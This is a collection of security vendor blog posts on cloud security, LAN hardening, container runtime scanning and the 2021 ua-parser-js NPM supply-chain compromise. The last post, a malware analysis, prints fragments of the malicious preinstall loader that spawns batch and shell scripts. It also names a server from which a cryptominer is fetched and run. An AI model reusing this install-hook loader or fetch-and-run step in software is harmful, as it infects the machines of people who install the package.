Cloud security is one of the big buzzwords in the security space along with big data and others. So we’ll try to tackle where cloud... Information Security Cloud Security: Current Status, Trends and Tips Kyle Wickert 2 min read Kyle Wickert Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/25/13 Published Cloud security is one of the big buzzwords in the security space along with big data and others. So we’ll try to tackle where cloud security is today, where its heading as well as outline challenges and offer tips for CIOs and CSOs looking to experiment with putting more systems and data in the cloud. The cloud is viewed by many as a solution to reducing IT costs and ultimately has led many organizations to accept data risks they would not consider acceptable in their own environments. In our State of Network Security 2013 Survey , we asked security professionals how many security controls were in the cloud and 60 percent of respondents reported having less than a quarter of their security controls in the cloud – and in North America the larger the organization, the less security controls in the cloud. Certainly some security controls just aren’t meant for the cloud, but I think this highlights the uncertainty around the cloud, especially for larger organizations. Current State of Cloud Security Cloud security has clearly emerged with both a technological and business case, but from a security perspective, it’s still a bit in a state of flux. A key challenges that many information security professionals are struggling with is how to classify the cloud and define the appropriate type of controls to secure data entering the cloud. While oftentimes the cloud is classified as a trusted network, the cloud is inherently untrusted since it is not simply an extension of the organization, but it’s an entirely separate environment that is out of the organization’s control. Today “the cloud” can mean a lot of things: a cloud could be a state-of-the-art data center or a server rack in a farm house holding your organization’s data. One of the biggest reasons that organizations entertain the idea of putting more systems, data and controls in the cloud is because of the certain cost savings. One tip would be to run a true cost-benefit-risk analysis that factors in the value of the data being sent into the cloud. There is value to be gained from sending non-sensitive data into the cloud, but when it comes to more sensitive information, the security costs will increase to the point where the analysis may suggest keeping in-house. Cloud Security Trends Here are several trends to look for when it comes to cloud security: Data security is moving to the forefront, as security teams refocus their efforts in securing the data itself instead of simply the servers it resides on. A greater focus is being put on efforts such as securing data-at-rest, thus mitigating the need to some degree the reliance on system administrators to maintain OS level controls, often outside the scope of management for information security teams. With more data breaches occurring each day, I think we will see a trend in collecting less data where is it simply not required. Systems that are processing or storing sensitive data, by their very nature, incur a high cost to IT departments, so we’ll see more effort being placed on business analysis and system architecture to avoid collecting data that may not be required for the business task. Gartner Research recently noted that by 2019, 90 percent of organizations will have personal data on IT systems they don’t own or control! Today, content and cloud providers typically use legal means to mitigate the impact of any potential breaches or loss of data. I think as cloud services mature, we’ll see more of a shift to a model where it’s not just these vendors offering software as a service, but also includes security controls in conjunction with their services. More pressure from security teams will be put on content providers to provide such things as dedicated database tiers, to isolate their organization’s data within the cloud itself. Cloud Security Tips Make sure you classify data before even considering sending it for processing or storage in the cloud. If data is deemed too sensitive, the risks of sending this data into the cloud must be weighed closely against the costs of appropriately securing it in the cloud. Once information is sent into the cloud, there is no going back! So make sure you’ve run a comprehensive analysis of what you’re putting in the cloud and vet your vendors carefully as cloud service providers use varying architectures, processes, and procedures that may place your data in many precarious places. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

A guide to application-centric security and compliance management WhitePaper Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

How to Secure Your Local Area Network In my last blog series we reviewed ways to protect the perimeter of your network and then we took... Firewall Change Management How to secure your LAN (Local Area Network) Matthew Pascucci 2 min read Matthew Pascucci Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/12/13 Published How to Secure Your Local Area Network In my last blog series we reviewed ways to protect the perimeter of your network and then we took it one layer deeper and discussed securing the DMZ . Now I’d like to examine the ways you can secure the Local Area Network, aka LAN, also known as the soft underbelly of the beast. Okay, I made that last part up, but that’s what it should be called. The LAN has become the focus of attack over the past couple years, due to companies tightening up their perimeter and DMZ. It’s very rare you’ll you see an attacker come right at you these days, when they can trick an unwitting user into clicking a weaponized link about “Cat Videos” (Seriously, who doesn’t like cat videos?!). With this being said, let’s talk about a few ways we can protect our soft underbelly and secure our network. For the first part of this blog series, let’s examine how to secure the LAN at the network layer. LAN and the Network Layer From the network layer, there are constant things that can be adjusted and used to tighten the posture of your LAN. The network is the highway where the data traverses. We need protection on the interstate just as we need protection on our network. Protecting how users are connecting to the Internet and other systems is an important topic. We could create an entire series of blogs on just this topic, but let’s try to condense it a little here. Verify that you’re network is segmented – it better be if you read my last article on the DMZ – but we need to make sure nothing from the DMZ is relying on internal services. This is a rule. Take them out now and thank us later. If this is happening, you are just asking for some major compliance and security issues to crop up. Continuing with segmentation, make sure there’s a guest network that vendors can attach to if needed. I hate when I go to a client/vendor’s site and they ask me to plug into their network. What if I was evil? What if I had malware on my laptop that’s now ripping throughout your network because I was dumb enough to click a link to a “Cat Video”? If people aren’t part of your company, they shouldn’t be connecting to your internal LAN plain and simple. Make sure you have egress filtering on your firewall so you aren’t giving complete access for users to pillage the Internet from your corporate workstation. By default users should only have access to port 80/443, anything else should be an edge case (in most environments). If users need FTP access there should be a rule and you’ll have to allow them outbound after authorization, but they shouldn’t be allowed to rush the Internet on every port. This stops malware, botnets, etc. that are communicating on random ports. It doesn’t protect everything since you can tunnel anything out of these ports, but it’s a layer! Set up some type of switch security that’s going to disable a port if there are different or multiple MAC addresses coming from a single port. This stops hubs from being installed in your network and people using multiple workstations. Also, attempt to set up NAC to get a much better understating of what’s connecting to your network while giving you complete control of those ports and access to resources from the LAN. In our next LAN security-focused blog, we’ll move from the network up the stack to the application layer. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Learn the basics of managing multiple workloads in the cloud and how to create a successful enterprise level security management program Webinars Journey to the Cloud Learn to speed up application delivery across a hybrid cloud environment while maintaining a high level of security Efficient cloud management helps simplify today’s complex network environment, allowing you to secure application connectivity anywhere. But it can be hard to achieve sufficient visibility when your data is dispersed across numerous public clouds, private clouds, and on-premises devices. Today it is easier than ever to speed up application delivery across a hybrid cloud environment while maintaining a high level of security. In this webinar, we’ll discuss: – The basics of managing multiple workloads in the cloud – How to create a successful enterprise-level security management program – The structure of effective hybrid cloud management July 5, 2022 Stephen Owen Esure Group Omer Ganot Product Manager Relevant resources Cloud atlas: how to accelerate application migrations to the cloud Keep Reading A Pragmatic Approach to Network Security Across Your Hybrid Cloud Environment Keep Reading 6 best practices to stay secure in the hybrid cloud Read Document Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

The Web application and service business loves containers, but they present a security challenge. Prevasio has the skills and experience... Cloud Security Don’t Neglect Runtime Container Security Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 9/21/20 Published The Web application and service business loves containers, but they present a security challenge. Prevasio has the skills and experience to meet the challenge. Its runtime scanning technology and techniques will let you avoid the serious risks of vulnerable or compromised containers. The very thing that makes Docker containers convenient — their all-in-one, self-contained structure — makes them opaque to traditional security tests. Instances come and go as needed, sometimes deleting themselves within seconds. This scalable and transient nature isn’t amenable to the usual tools. Prevasio’s approach is specifically designed to analyze and test containers safely, finding any problems before they turn into security incidents. The container supply chain Container images put together code from many sources. They include original source or binary code, application libraries,language support, and configuration data. The developer puts them all together and delivers the resulting image. A complex container has a long supply chain,and many things can go wrong. Each item in the image could carry a risk. The container developer could use buggy or outdated components, or it could use them improperly. The files it imports could be compromised. A Docker image isn’t a straightforward collection of files, like a gzip file. An image may be derived from another image. Extracting all its files and parameters is possible but not straightforward. Vulnerabilities and malicious actions We can divide container risks into two categories: vulnerabilities and malicious code. Vulnerabilities A vulnerability unintentionally introduces risk. An outsider can exploit them to steal information or inflict damage. In a container, they can result from poor-quality or outdated components. The building process for a complex image is hard to keep up to date. There are many ways for something to go wrong. Vulnerability scanners don’t generally work on container images. They can’t find all the components. It’s necessary to check an active container to get adequate insight. This is risky if it’s done in a production environment. Container vulnerabilities include configuration weaknesses as well as problems in code. An image that uses a weak password or unnecessarily exposes administrative functions is open to attacks. Malicious code Malware in a container is more dangerous than vulnerabilities. It could intrude at any point in the supply chain. The developer might receive a compromised version of a runtime library. A few unscrupulous developers put backdoors into code that they ship. Sometimes they add backdoors for testing purposes and forget to remove them from the finished product. The only way to catch malware in a container is by its behavior. Monitoring the network and checking the file system for suspicious changes will discover misbehaving code. The Prevasio solution Security tools designed for statically loaded code aren’t very helpful with containers. Prevasio has created a new approach that analyzes containers without making any assumptions about their safety. It loads them into a sandboxed environment where they can’t do any harm and analyzes them.The analysis includes the following: Scanning of components for known vulnerabilities Automated pen-test attacks Behavioral analysis of running code Traffic analysis to discover suspicious data packets Machine learning to identify malicious binaries The analysis categorizes an image as benign,vulnerable, exploitable, dangerous, or harmful. The administrator looks at agraph to identify any problems visually, without digging through logs. They can tell at a glance whether an image is reasonably safe to run, needs to be sent back for fixes, or should be discarded on the spot. If you look at competing container security solutions, you’ll find that the key is runtime technology. Static analysis, vulnerability scans, and signature checking won’t get you enough protection by themselves. Prevasio gives you the most complete and effective checking of container images, helping you to avoid threats to your data and your business. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" , (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, Prevasio found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call